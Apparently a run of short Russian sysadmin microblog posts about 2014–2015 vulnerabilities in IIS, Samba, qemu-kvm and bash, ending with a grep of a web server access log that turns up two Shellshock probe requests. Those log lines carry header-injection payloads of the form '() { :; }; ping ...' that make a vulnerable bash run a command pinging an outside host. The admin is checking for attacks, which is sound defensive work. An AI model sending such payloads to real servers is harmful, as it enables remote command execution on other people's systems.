https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/ Тут в IIS нашелся очередной эпик.

https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ Как обычно, не забываем о том, что самба решето и требует тщательного аппармора вокруг себя

Сегодня вечером ожидается пятиминутный даунтайм потому что qemu-kvm решето

опять апдейт баша прилетел. уже третий за это неделю

> grep '()\s*{' /var/log/lighttpd/access.log 209.126.230.72 - - [25/Sep/2014:06:02:49 +0400] "GET / HTTP/1.0" 400 349 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 89.207.135.125 - - [25/Sep/2014:10:54:19 +0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"